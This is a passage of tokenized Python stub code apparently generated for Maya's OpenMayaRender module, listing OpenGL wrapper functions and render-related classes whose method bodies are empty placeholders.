kwargs ) : <EOL> pass <EOL> def glTransformFeedbackVaryingsEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def 
glTransformFeedbackVaryingsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glTranslated ( * args , ** kwargs ) : <EOL> pass <EOL> def glTranslatef ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform1ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform2ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform3ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4fARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4iARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniform4ivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniformMatrix2fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniformMatrix3fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUniformMatrix4fvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUnlockArraysEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glUnmapBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glUseProgramObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glValidateProgramARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantbvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantdvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantsvEXT ( * args , ** kwargs ) : <EOL> 
pass <EOL> def glVariantubvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantuivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVariantusvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertex4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexArrayRangeNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1fNV ( * args , 
** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib1svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib2svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib3svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nbv ( * args 
, ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Niv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nsv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nub ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nuiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4Nusv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4sNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4ubNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4ubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4ubvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4uiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttrib4usv ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribPointerNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs1dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs1fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs1svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def 
glVertexAttribs2dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs2fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs2svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs3dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs3fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs3svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4svNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexAttribs4ubvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexWeightPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexWeightfEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glVertexWeightfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glViewport ( * args , ** kwargs ) : <EOL> pass <EOL> def glWriteMaskEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def maxTextureSize ( * args , ** kwargs ) : <EOL> pass <EOL> def maxVertexAttributes ( * args , ** kwargs ) : <EOL> pass <EOL> def numTexImageUnits ( * args , ** kwargs ) : <EOL> pass <EOL> def numTexInterpolants ( * args , ** kwargs ) : <EOL> pass <EOL> def numTexUnits ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kMGL_Version11 = <NUM_LIT:0> <EOL> kMGL_Version12 = <NUM_LIT:1> <EOL> kMGL_Version121 = <NUM_LIT:2> <EOL> kMGL_Version13 = <NUM_LIT:3> <EOL> kMGL_Version14 = <NUM_LIT:4> <EOL> kMGL_Version15 = <NUM_LIT:5> <EOL> kMGL_Version20 = <NUM_LIT:6> <EOL> class MRenderView ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def doesRenderEditorExist ( * args , ** kwargs ) : <EOL> pass <EOL> def endRender ( * args , ** kwargs ) : <EOL> pass <EOL> def 
getRenderRegion ( * args , ** kwargs ) : <EOL> pass <EOL> def refresh ( * args , ** kwargs ) : <EOL> pass <EOL> def setCurrentCamera ( * args , ** kwargs ) : <EOL> pass <EOL> def startRegionRender ( * args , ** kwargs ) : <EOL> pass <EOL> def startRender ( * args , ** kwargs ) : <EOL> pass <EOL> def updatePixels ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MGeometryManager ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def dereferenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def getGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def referenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kDefaultCube = <NUM_LIT:2> <EOL> kDefaultPlane = <NUM_LIT:1> <EOL> kDefaultSphere = <NUM_LIT:0> <EOL> class MVaryingParameter ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addElement ( * args , ** kwargs ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def destinationSet ( * args , ** kwargs ) : <EOL> pass <EOL> def dimension ( * args , ** kwargs ) : <EOL> pass <EOL> def getBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def getElement ( * args , ** kwargs ) : <EOL> pass <EOL> def getElementSize ( * args , ** kwargs ) : <EOL> pass <EOL> def getMaximumStride ( * args , ** kwargs ) : <EOL> pass <EOL> def getSourceSetName ( * args , ** kwargs ) : <EOL> pass <EOL> def getSourceType ( * args , ** kwargs ) : <EOL> pass <EOL> def getUpdateId ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def numElements ( * args , ** kwargs ) : <EOL> pass <EOL> def removeElements ( * args , ** kwargs ) : <EOL> pass <EOL> def semantic ( * args , ** kwargs 
) : <EOL> pass <EOL> def semanticName ( * args , ** kwargs ) : <EOL> pass <EOL> def setSource ( * args , ** kwargs ) : <EOL> pass <EOL> def type ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kBinormal = <NUM_LIT:8> <EOL> kChar = <NUM_LIT:3> <EOL> kColor = <NUM_LIT:4> <EOL> kDouble = <NUM_LIT:2> <EOL> kFloat = <NUM_LIT:1> <EOL> kInt16 = <NUM_LIT:5> <EOL> kInt32 = <NUM_LIT:7> <EOL> kInvalidParameter = - <NUM_LIT:1> <EOL> kNoSemantic = <NUM_LIT:0> <EOL> kNormal = <NUM_LIT:2> <EOL> kPosition = <NUM_LIT:1> <EOL> kStructure = <NUM_LIT:0> <EOL> kTangent = <NUM_LIT:7> <EOL> kTexCoord = <NUM_LIT:3> <EOL> kUnsignedChar = <NUM_LIT:4> <EOL> kUnsignedInt16 = <NUM_LIT:6> <EOL> kUnsignedInt32 = <NUM_LIT:8> <EOL> kWeight = <NUM_LIT:5> <EOL> class MRenderCallback ( _object ) : <EOL> def __disown__ ( self ) : <EOL> pass <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def postProcessCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def renderCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def shadowCastCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MUniformParameter ( _object ) : <EOL> def UIHidden ( * args , ** kwargs ) : <EOL> pass <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsBool ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsFloat ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsFloatArray ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsInt ( * args , ** kwargs ) : <EOL> pass <EOL> def getAsString ( * args , ** kwargs ) : <EOL> pass <EOL> def getPlug ( * args , ** kwargs ) : <EOL> pass <EOL> 
def getSource ( * args , ** kwargs ) : <EOL> pass <EOL> def hasChanged ( * args , ** kwargs ) : <EOL> pass <EOL> def isATexture ( * args , ** kwargs ) : <EOL> pass <EOL> def keyable ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def numColumns ( * args , ** kwargs ) : <EOL> pass <EOL> def numElements ( * args , ** kwargs ) : <EOL> pass <EOL> def numRows ( * args , ** kwargs ) : <EOL> pass <EOL> def semantic ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsBool ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsFloat ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsFloatArray ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsInt ( * args , ** kwargs ) : <EOL> pass <EOL> def setAsString ( * args , ** kwargs ) : <EOL> pass <EOL> def setDirty ( * args , ** kwargs ) : <EOL> pass <EOL> def setEnumFieldNames ( * args , ** kwargs ) : <EOL> pass <EOL> def setKeyable ( * args , ** kwargs ) : <EOL> pass <EOL> def setRangeMax ( * args , ** kwargs ) : <EOL> pass <EOL> def setRangeMin ( * args , ** kwargs ) : <EOL> pass <EOL> def setSoftRangeMax ( * args , ** kwargs ) : <EOL> pass <EOL> def setSoftRangeMin ( * args , ** kwargs ) : <EOL> pass <EOL> def setUIHidden ( * args , ** kwargs ) : <EOL> pass <EOL> def setUINiceName ( * args , ** kwargs ) : <EOL> pass <EOL> def type ( * args , ** kwargs ) : <EOL> pass <EOL> def userData ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kSemanticBackgroundColor = <NUM_LIT> <EOL> kSemanticBump = <NUM_LIT:11> <EOL> kSemanticBumpTexture = <NUM_LIT:30> <EOL> kSemanticColor = <NUM_LIT:9> <EOL> kSemanticColorTexture = <NUM_LIT> <EOL> kSemanticEnvironment = <NUM_LIT:12> <EOL> kSemanticFrameNumber = <NUM_LIT> <EOL> kSemanticLocalViewer = <NUM_LIT> <EOL> kSemanticNormal = <NUM_LIT:10> <EOL> kSemanticNormalTexture = <NUM_LIT> <EOL> kSemanticNormalizationTexture = <NUM_LIT> <EOL> kSemanticObjectDir = <NUM_LIT:1> 
<EOL> kSemanticObjectPos = <NUM_LIT:5> <EOL> kSemanticProjectionDir = <NUM_LIT:4> <EOL> kSemanticProjectionInverseMatrix = <NUM_LIT:20> <EOL> kSemanticProjectionInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticProjectionMatrix = <NUM_LIT> <EOL> kSemanticProjectionPos = <NUM_LIT:8> <EOL> kSemanticProjectionTransposeMatrix = <NUM_LIT> <EOL> kSemanticTime = <NUM_LIT:32> <EOL> kSemanticUnknown = <NUM_LIT:0> <EOL> kSemanticViewDir = <NUM_LIT:3> <EOL> kSemanticViewInverseMatrix = <NUM_LIT> <EOL> kSemanticViewInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewMatrix = <NUM_LIT:16> <EOL> kSemanticViewPos = <NUM_LIT:7> <EOL> kSemanticViewProjectionInverseMatrix = <NUM_LIT> <EOL> kSemanticViewProjectionInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewProjectionMatrix = <NUM_LIT> <EOL> kSemanticViewProjectionTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewTransposeMatrix = <NUM_LIT> <EOL> kSemanticViewportPixelSize = <NUM_LIT> <EOL> kSemanticWorldDir = <NUM_LIT:2> <EOL> kSemanticWorldInverseMatrix = <NUM_LIT> <EOL> kSemanticWorldInverseTransposeMatrix = <NUM_LIT:15> <EOL> kSemanticWorldMatrix = <NUM_LIT> <EOL> kSemanticWorldPos = <NUM_LIT:6> <EOL> kSemanticWorldTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewInverseMatrix = <NUM_LIT> <EOL> kSemanticWorldViewInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionInverseMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionInverseTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionMatrix = <NUM_LIT> <EOL> kSemanticWorldViewProjectionTransposeMatrix = <NUM_LIT> <EOL> kSemanticWorldViewTransposeMatrix = <NUM_LIT> <EOL> kType1DTexture = <NUM_LIT:4> <EOL> kType2DTexture = <NUM_LIT:5> <EOL> kType3DTexture = <NUM_LIT:6> <EOL> kTypeBool = <NUM_LIT:1> <EOL> kTypeCubeTexture = <NUM_LIT:7> <EOL> kTypeEnum = <NUM_LIT:10> <EOL> kTypeEnvTexture = <NUM_LIT:8> <EOL> kTypeFloat = <NUM_LIT:3> <EOL> kTypeInt = <NUM_LIT:2> <EOL> kTypeString = <NUM_LIT:9> <EOL> 
kTypeUnknown = <NUM_LIT:0> <EOL> class MDrawProcedureBase ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def enabled ( * args , ** kwargs ) : <EOL> pass <EOL> def execute ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def setEnabled ( * args , ** kwargs ) : <EOL> pass <EOL> def setName ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MGeometryList ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addLast ( * args , ** kwargs ) : <EOL> pass <EOL> def cullMode ( * args , ** kwargs ) : <EOL> pass <EOL> def geometry ( * args , ** kwargs ) : <EOL> pass <EOL> def isDone ( * args , ** kwargs ) : <EOL> pass <EOL> def length ( * args , ** kwargs ) : <EOL> pass <EOL> def next ( * args , ** kwargs ) : <EOL> pass <EOL> def objectToWorldMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def path ( * args , ** kwargs ) : <EOL> pass <EOL> def projectionMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def reset ( * args , ** kwargs ) : <EOL> pass <EOL> def setCurrentElement ( * args , ** kwargs ) : <EOL> pass <EOL> def viewMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> MSetupFlags = None <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kAll = - <NUM_LIT:1> <EOL> kCullCCW = <NUM_LIT:2> <EOL> kCullCW = <NUM_LIT:1> <EOL> kCullNone = <NUM_LIT:0> <EOL> kCulling = <NUM_LIT:4> <EOL> kFixedFunctionLighting = <NUM_LIT:2> <EOL> kMatrices = <NUM_LIT:1> <EOL> kNone = <NUM_LIT:0> <EOL> class MSwatchRenderRegister ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def registerSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> def unregisterSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> 
__dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MFnRenderLayer ( OpenMaya . MFnDependencyNode ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def adjustmentPlug ( * args , ** kwargs ) : <EOL> pass <EOL> def externalRenderPasses ( * args , ** kwargs ) : <EOL> pass <EOL> def inCurrentRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def inLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def isPlugAdjusted ( * args , ** kwargs ) : <EOL> pass <EOL> def layerChildren ( * args , ** kwargs ) : <EOL> pass <EOL> def listMembers ( * args , ** kwargs ) : <EOL> pass <EOL> def passHasLight ( * args , ** kwargs ) : <EOL> pass <EOL> def passHasObject ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def currentLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def defaultRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def findLayerByName ( * args , ** kwargs ) : <EOL> pass <EOL> def listAllRenderLayers ( * args , ** kwargs ) : <EOL> pass <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MGeometryPrimitive ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def data ( * args , ** kwargs ) : <EOL> pass <EOL> def dataType ( * args , ** kwargs ) : <EOL> pass <EOL> def drawPrimitiveType ( * args , ** kwargs ) : <EOL> pass <EOL> def elementCount ( * args , ** kwargs ) : <EOL> pass <EOL> def uniqueID ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kInvalidIndexType = <NUM_LIT:0> <EOL> kLineLoop = <NUM_LIT:4> <EOL> kLineStrip = <NUM_LIT:3> <EOL> kLines = <NUM_LIT:2> <EOL> kMaxDrawPrimitiveTypeIndex = <NUM_LIT:11> <EOL> kPoints = <NUM_LIT:1> <EOL> kPolygon = <NUM_LIT:10> <EOL> kQuadStrip = <NUM_LIT:9> <EOL> kQuads = <NUM_LIT:8> <EOL> kTriangleFan = <NUM_LIT:7> <EOL> 
kTriangleStrip = <NUM_LIT:6> <EOL> kTriangles = <NUM_LIT:5> <EOL> class MRenderTarget ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def height ( * args , ** kwargs ) : <EOL> pass <EOL> def makeTargetCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def width ( * args , ** kwargs ) : <EOL> pass <EOL> def writeColorBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> class MGeometryData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def collectionNumber ( * args , ** kwargs ) : <EOL> pass <EOL> def data ( * args , ** kwargs ) : <EOL> pass <EOL> def dataType ( * args , ** kwargs ) : <EOL> pass <EOL> def elementCount ( * args , ** kwargs ) : <EOL> pass <EOL> def elementSize ( * args , ** kwargs ) : <EOL> pass <EOL> def elementType ( * args , ** kwargs ) : <EOL> pass <EOL> def elementTypeSize ( * args , ** kwargs ) : <EOL> pass <EOL> def objectName ( * args , ** kwargs ) : <EOL> pass <EOL> def objectOwnsData ( * args , ** kwargs ) : <EOL> pass <EOL> def setCollectionNumber ( * args , ** kwargs ) : <EOL> pass <EOL> def setObjectOwnsData ( * args , ** kwargs ) : <EOL> pass <EOL> def uniqueID ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kAPISupported = <NUM_LIT:6> <EOL> kBiNormal = <NUM_LIT:8> <EOL> kChar = <NUM_LIT:2> <EOL> kColor = <NUM_LIT:4> <EOL> kColorMask = <NUM_LIT:11> <EOL> kDouble = <NUM_LIT:1> <EOL> kFloat = <NUM_LIT:0> <EOL> kFour = <NUM_LIT:4> <EOL> kInt16 = <NUM_LIT:4> <EOL> kInt32 = <NUM_LIT:6> <EOL> kInvalidDataType = <NUM_LIT:0> <EOL> kInvalidElementSize = <NUM_LIT:0> <EOL> kInvalidElementType = - <NUM_LIT:1> <EOL> kMaxDataTypeIndex = <NUM_LIT> <EOL> kNormal = <NUM_LIT:2> <EOL> kOne = <NUM_LIT:1> <EOL> kPosition = <NUM_LIT:1> <EOL> kPrimitiveCenter = 
<NUM_LIT:10> <EOL> kTangent = <NUM_LIT:7> <EOL> kTexCoord = <NUM_LIT:3> <EOL> kThree = <NUM_LIT:3> <EOL> kTwo = <NUM_LIT:2> <EOL> kUnsignedChar = <NUM_LIT:3> <EOL> kUnsignedInt16 = <NUM_LIT:5> <EOL> kUnsignedInt32 = <NUM_LIT:7> <EOL> kUserData = <NUM_LIT:12> <EOL> kVelocity = <NUM_LIT:9> <EOL> kWeight = <NUM_LIT:5> <EOL> class MCommonRenderSettingsData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getBufferName ( * args , ** kwargs ) : <EOL> pass <EOL> def getImageName ( * args , ** kwargs ) : <EOL> pass <EOL> def isAnimated ( * args , ** kwargs ) : <EOL> pass <EOL> def isMovieFormat ( * args , ** kwargs ) : <EOL> pass <EOL> def setFieldName ( * args , ** kwargs ) : <EOL> pass <EOL> def setPassName ( * args , ** kwargs ) : <EOL> pass <EOL> def shouldRenderFrameAtTime ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def getPostRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> def getPreRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> customExt = None <EOL> customImageFormat = None <EOL> deviceAspectRatio = None <EOL> dotPerInch = None <EOL> enableDefaultLight = None <EOL> frameBy = None <EOL> frameEnd = None <EOL> framePadding = None <EOL> frameStart = None <EOL> height = None <EOL> imageFormat = None <EOL> name = None <EOL> namePattern = None <EOL> namingScheme = None 